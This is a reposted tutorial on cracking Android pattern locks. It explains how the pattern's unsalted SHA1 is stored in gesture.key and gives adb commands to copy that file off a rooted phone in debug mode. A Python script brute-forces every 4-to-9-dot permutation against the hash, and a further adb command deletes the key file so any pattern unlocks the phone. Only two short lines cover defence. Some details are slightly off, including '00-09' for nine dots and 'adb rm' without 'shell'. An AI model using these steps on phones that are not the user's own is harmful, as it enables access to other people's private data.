Hack Android Phone Graphics lock

Source: Internet
Author: User

The Android phone's graphics (pattern) lock uses a 3*3, 4*4 or 5*5 dot matrix; several dots are connected in sequence to lock or unlock the phone. Taking 3*3 as an example, you need to connect at least 4 points and at most 9 points. While the pattern is drawn, each of the 9 points that is selected in fact represents a number. When we connect 4 points, the resulting pattern therefore also produces a password. For example, if we select the four points 02, 04, 05 and 08, the password is 02040508. Of course, for security, the generated password is not stored directly: the Android system converts 02040508 to hexadecimal, hashes it with SHA1 and stores the result in the /data/system/gesture.key file on the phone. All we have to do is crack the value stored in this file; that gives the points of the pattern in the order they are drawn, and with them access to the phone.

There are two prerequisites for the hack:

(1) The phone must be rooted;

(2) Debug mode must be turned on.

Once these two conditions are met, we can begin to crack the Android phone's graphics password.

First use ADB to enter the shell mode of the phone. Then run adb pull /data/system/gesture.key gesture.key to copy the file that stores the key to your computer. Open the gesture.key file with C32asm and you will see that its content is a SHA1 value, as shown in Figure 1:

Figure 1

Because the key is a point-based password, the password recovered from the SHA1 value should be between 4 and 9 points long. The number of possible passwords is probably between 3024~985824. Now that the number of passwords is known, we can brute-force the password.
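The keyspace figures above can be checked directly. The following Python is an added example, not code from the original article: it reproduces 3024 and 985824 as plain permutations of 9 dots and, going beyond the text, also counts only the patterns that can actually be drawn. It assumes dots are numbered 0-8 row by row and that a stroke cannot jump over a dot that has not been visited yet; the function names and the SKIP table are this example's own.

```python
from math import perm

# Dots are numbered 0..8 row by row, matching the article's 00..08 encoding.
# SKIP[(a, b)] is the dot lying exactly between a and b on a straight line.
# Assumption (not stated in the article): the lock screen will not let a
# stroke jump over a dot that has not been visited yet.
SKIP = {}
for a, b, mid in [(0, 2, 1), (3, 5, 4), (6, 8, 7),   # rows
                  (0, 6, 3), (1, 7, 4), (2, 8, 5),   # columns
                  (0, 8, 4), (2, 6, 4)]:             # diagonals
    SKIP[(a, b)] = SKIP[(b, a)] = mid


def count_drawable(length):
    """Count patterns of `length` dots that can actually be drawn."""
    def extend(last, visited, remaining):
        # `visited` is a 9-bit mask: bit i is set once dot i has been used
        if remaining == 0:
            return 1
        total = 0
        for nxt in range(9):
            if (visited >> nxt) & 1:
                continue                      # dot already used
            mid = SKIP.get((last, nxt))
            if mid is not None and not (visited >> mid) & 1:
                continue                      # would jump over an unvisited dot
            total += extend(nxt, visited | (1 << nxt), remaining - 1)
        return total
    return sum(extend(s, 1 << s, length - 1) for s in range(9))


def keyspace_table(min_len=4, max_len=9):
    """Rows of (length, unrestricted permutations, drawable patterns)."""
    return [(n, perm(9, n), count_drawable(n)) for n in range(min_len, max_len + 1)]


if __name__ == "__main__":
    rows = keyspace_table()
    for n, p, d in rows:
        print(f"{n} dots: {p:>7} permutations, {d:>7} drawable")
    print("total:", sum(r[1] for r in rows), "permutations,",
          sum(r[2] for r in rows), "drawable")
```

Either total is small enough to enumerate in full, which is why an unsalted SHA1 of the pattern offers no real protection once gesture.key can be read.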

Use Python to write a brute-force cracking program:

The main programming idea is as follows: first, the numbers 00-09 are arranged into sequences, which requires the itertools module in Python for the iteration. Each combined sequence of numbers is hashed with the hashlib module and then compared against the key in the gesture.key file, until a matching set of numbers is found.

Code:

    # coding: utf-8
    import hashlib
    import itertools
    import os

    # Call adb from cmd to connect to the phone and read the SHA1 string
    # os.system(r"adb pull /data/system/gesture.key gesture.key")

    # gesture.key holds the raw 20-byte SHA1 digest, so read it in binary mode
    with open('gesture.key', 'rb') as f:
        pswd = f.read()
    pswd_hex = pswd.hex()
    print('The password after encryption is: %s' % pswd_hex)

    # Generate the unlock sequence: ['00', '01', '02', '03', '04', '05', '06', '07', '08']
    matrix = ['0' + str(i) for i in range(0, 9)]

    # Arrange the characters 00--08 using at least 4 numbers, up to all of them
    min_num = 4
    max_num = len(matrix)

    for num in range(min_num, max_num + 1):  # from 4 to 9
        # Select num of the 9 numbers and arrange them; iterate lazily
        # instead of storing every permutation in a list
        for el in itertools.permutations(matrix, num):
            # Convert the tuple to a str: ['00','03','06','07','08'] --> 0003060708
            strlist = ''.join(el)
            # SHA1 of the hex-decoded string
            strlist_sha1 = hashlib.sha1(bytes.fromhex(strlist)).hexdigest()
            # Compare the string from the phone file with the computed SHA1
            if pswd_hex == strlist_sha1:
                print('The unlock password is:', strlist)

When the script finishes, the password for the graphics sequence is printed; drawing the corresponding pattern in the order 0001020406 unlocks the phone.


This method places quite a few requirements on access to the phone: first of all, the phone must be rooted with the highest permissions, and developer debugging mode must be turned on.

The defense against the above attack is to turn off developer debug mode, so that if the phone is stolen, other people cannot use adb debugging on it to get the password. Also prevent Trojans from being implanted on the phone, because a Trojan can also export the gesture.key key file from the phone.

In addition, if you have simply forgotten your phone's graphics lock password, there is a simpler way: connect to the phone with ADB, then use "adb rm /data/system/gesture.key" to delete the gesture.key file. The graphics lock is then invalid, and drawing any pattern at all will unlock the phone.

Reference article: http://www.jb51.net/softjc/295236.html
